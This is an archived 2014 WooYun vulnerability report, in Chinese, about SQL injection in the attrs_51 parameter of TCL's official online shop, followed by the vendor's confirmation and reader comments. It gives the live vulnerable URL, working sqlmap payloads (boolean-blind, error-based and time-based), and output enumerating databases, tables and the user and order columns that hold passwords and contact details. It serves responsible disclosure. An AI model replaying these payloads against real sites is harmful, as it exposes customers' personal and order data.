当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077768

漏洞标题:TCL官方商城存在sql注入,影响大量用户和订单数据

相关厂商:TCL官方网上商城

漏洞作者: xyang

提交时间:2014-09-29 16:35

修复时间:2014-11-13 16:36

公开时间:2014-11-13 16:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-29: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-13: 细节向公众公开

简要描述:

影响大量订单数据以及用户信息泄漏风险
用户量(约十万)订单数据(约3万)
未做任何破坏,可查证:)希望尽快修复!!

详细说明:

漏洞地址:

http://shop.tcl.com/mall/goods/index.html?cat_id=20&attrs_51=515


[J69[242GEPKJL(`@RBTLYM.jpg


直接报错了,那么接下来按部就班
注入参数:attrs_51
payload

---
Place: GET
Parameter: attrs_51
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: cat_id=20&attrs_51=515 RLIKE (SELECT (CASE WHEN (8708=8708) THEN 515 ELSE 0x28 
END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat_id=20&attrs_51=515 AND (SELECT 2138 FROM(SELECT COUNT(*),CONCAT
(0x716c676b71,(SELECT (CASE WHEN (2138=2138) THEN 1 ELSE 0 END)),0x7161706e71,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat_id=20&attrs_51=515 AND SLEEP(5)
---


列数据库:

[01:06:22] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.0
[01:06:22] [INFO] fetching database names
[01:06:27] [INFO] the SQL query used returns 3 entries
[01:06:30] [INFO] retrieved: information_schema
[01:06:34] [INFO] retrieved: shoptcl
[01:06:37] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] shoptcl
[*] test


跑表

Database: shoptcl
[152 tables]
+------------------------------+
| base_generate_number         |
| c_goods_spec_index_0916      |
| ec_brand                     |
| ec_brand_category            |
| ec_bulk_purchase             |
| ec_cart                      |
| ec_category_spec             |
| ec_category_spec_value       |
| ec_comment                   |
| ec_comment_image             |
| ec_consultation              |
| ec_coupons                   |
| ec_coupons_goods             |
| ec_coupons_use_detail        |
| ec_custom_cat_menu           |
| ec_evaluate                  |
| ec_evaluate_detail           |
| ec_fenxiao_account           |
| ec_fenxiao_copywritten       |
| ec_fenxiao_fans_contact      |
| ec_fenxiao_goods             |
| ec_fenxiao_income_detail     |
| ec_fenxiao_income_use_detail |
| ec_fenxiao_level             |
| ec_fenxiao_order             |
| ec_fenxiao_order_item        |
| ec_fenxiao_product           |
| ec_fenxiao_share             |
| ec_fenxiao_share_stat        |
| ec_fenxiao_shop_rela         |
| ec_fenxiao_user              |
| ec_fenxiao_user_audit        |
| ec_fenxiao_user_cust         |
| ec_fenxiao_withdraw          |
| ec_freight_tpl               |
| ec_freight_tpl_area          |
| ec_freight_tpl_detail        |
| ec_goods                     |
| ec_goods_collocation         |
| ec_goods_custom_cat          |
| ec_goods_gift                |
| ec_goods_image               |
| ec_goods_mapping             |
| ec_goods_pkg                 |
| ec_goods_pkg_detail          |
| ec_goods_pkg_image           |
| ec_goods_relation            |
| ec_goods_set                 |
| ec_goods_set_detail          |
| ec_goods_spec_index          |
| ec_group_purchase_item       |
| ec_inventory_occupy_detail   |
| ec_logistics_info            |
| ec_logistics_tracking        |
| ec_order                     |
| ec_order_discount            |
| ec_order_item                |
| ec_order_log                 |
| ec_order_msg_log             |
| ec_order_refund              |
| ec_order_refund_log          |
| ec_payment                   |
| ec_payment_cfg               |
| ec_product                   |
| ec_product_sku_rela          |
| ec_product_sku_rela_0918     |
| ec_promotion                 |
| ec_promotion_discount        |
| ec_promotion_integral        |
| ec_promotion_present         |
| ec_promotion_reduce          |
| ec_promotion_seckill         |
| ec_push_msg                  |
| ec_search_keword             |
| ec_search_keyword            |
| ec_search_log                |
| ec_search_rela_keword        |
| ec_search_weight_adjust      |
| ec_search_weight_rule        |
| ec_service_policy            |
| ec_shop                      |
| ec_shop_category             |
| ec_shop_sub_account          |
| ec_spec                      |
| ec_spec_value                |
| ec_store                     |
| ec_store_cover               |
| ec_store_inventory           |
| ec_store_sku                 |
| ec_transfer_account          |
| ec_user_favorite             |
| ec_user_history              |
| esb_app_info                 |
| esb_app_permission           |
| esb_msg_data                 |
| esb_msg_que                  |
| esb_service                  |
| esb_service_api              |
| ro_resource                  |
| ro_role                      |
| ro_role_priv                 |
| ro_seller_log                |
| ro_seller_menu               |
| ro_subacct_role              |
| ro_user                      |
| ro_user_address              |
| sys_access_log               |
| sys_admin                    |
| sys_admin_log                |
| sys_admin_role               |
| sys_admin_role_priv          |
| sys_article                  |
| sys_caches                   |
| sys_category                 |
| sys_custom_category          |
| sys_dict                     |
| sys_dict_type                |
| sys_district                 |
| sys_email_verify_code        |
| sys_feedback                 |
| sys_file                     |
| sys_file_server              |
| sys_file_type                |
| sys_image_thumbrule          |
| sys_meta                     |
| sys_object_file              |
| sys_point_rule               |
| sys_position                 |
| sys_position_data            |
| sys_position_keyword         |
| sys_position_space           |
| sys_poster                   |
| sys_poster_click             |
| sys_poster_space             |
| sys_reg_invite               |
| sys_resource                 |
| sys_role                     |
| sys_session                  |
| sys_setting                  |
| sys_sms_sendlist             |
| sys_sms_templates            |
| sys_sms_verify_code          |
| sys_template                 |
| sys_template_type            |
| sys_user_point               |
| sys_user_point_detail        |
| sys_user_point_use_detail    |
| sys_user_rank                |
| sys_widget_callset           |
| sys_widget_template          |
| sys_widget_type              |
| tmp_0916                     |
+------------------------------+


既然是商城,那么来看看订单表结构:)

Database: shoptcl
Table: ec_order
[49 columns]
+----------------------+---------------+
| Column               | Type          |
+----------------------+---------------+
| adjust_fee           | decimal(10,2) |
| buyer_message        | varchar(255)  |
| client_ip            | varchar(50)   |
| created_time         | datetime      |
| discount_fee         | decimal(10,2) |
| end_time             | datetime      |
| evaluate_status      | int(11)       |
| invoice_name         | varchar(255)  |
| invoice_type         | int(11)       |
| modified_time        | datetime      |
| need_invoice         | int(11)       |
| order_discount_fee   | decimal(10,2) |
| order_from           | varchar(50)   |
| order_id             | int(11)       |
| order_sn             | varchar(64)   |
| order_status         | int(11)       |
| pay_id               | int(11)       |
| pay_status           | int(11)       |
| pay_time             | datetime      |
| payment              | decimal(10,2) |
| payment_code         | varchar(50)   |
| payment_type         | int(11)       |
| point_fee            | decimal(10,2) |
| post_fee             | decimal(10,2) |
| present_point        | int(11)       |
| print_number         | int(11)       |
| receiver_address     | varchar(255)  |
| receiver_city        | varchar(50)   |
| receiver_district    | varchar(150)  |
| receiver_district_id | int(11)       |
| receiver_email       | varchar(150)  |
| receiver_mobile      | varchar(50)   |
| receiver_name        | varchar(50)   |
| receiver_phone       | varchar(30)   |
| receiver_state       | varchar(50)   |
| receiver_zip         | varchar(20)   |
| refund_status        | int(11)       |
| seller_email         | varchar(50)   |
| seller_memo          | varchar(255)  |
| seller_mobile        | varchar(50)   |
| seller_name          | varchar(50)   |
| seller_phone         | varchar(50)   |
| shipping_time        | datetime      |
| shop_id              | int(11)       |
| status               | int(11)       |
| total_fee            | decimal(10,2) |
| trade_source         | varchar(255)  |
| use_point            | int(11)       |
| user_id              | int(11)       |
+----------------------+---------------+


然后就悲剧了,发现数据量还是挺大的,接近三万啊~~有图有真相

order订单.jpg


再看看用户表,吓了一跳,近十万的用户啊~~

Database: shoptcl
Table: ro_user
[24 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| birthday      | datetime     |
| description   | varchar(400) |
| email         | varchar(64)  |
| email_status  | tinyint(4)   |
| encrypt       | varchar(32)  |
| gender        | tinyint(4)   |
| id            | int(11)      |
| last_ip       | varchar(32)  |
| last_login    | datetime     |
| last_time     | datetime     |
| login_num     | int(11)      |
| mobilephone   | varchar(32)  |
| modified_time | datetime     |
| nickname      | varchar(64)  |
| password      | varchar(32)  |
| pid           | varchar(20)  |
| real_name     | varchar(64)  |
| reg_ip        | varchar(32)  |
| reg_time      | datetime     |
| status        | tinyint(4)   |
| telephone     | varchar(32)  |
| third_pintai  | varchar(40)  |
| third_uid     | varchar(255) |
| user_name     | varchar(64)  |
+---------------+--------------+


user用户信息表.jpg


漏洞证明:

order订单.jpg

user用户信息表.jpg


修复方案:

:)参数过滤,,另外网站的报错可以隐藏
仅仅输出了部分测试数据,未破坏,未深入,然后就ctrl+c了
请贵站尽快安排修复:)

版权声明:转载请注明来源 xyang@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-29 16:42

厂商回复:

感谢您的工作,已转交相关单位确认处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-29 16:39 | Eoh ( 普通白帽子 | Rank:286 漏洞数:35 )

    已不想在提TCL的洞了,命令执行才10分。

  2. 2014-09-29 16:50 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    脑子瓦特了吧?别人不是给你20分么?哈哈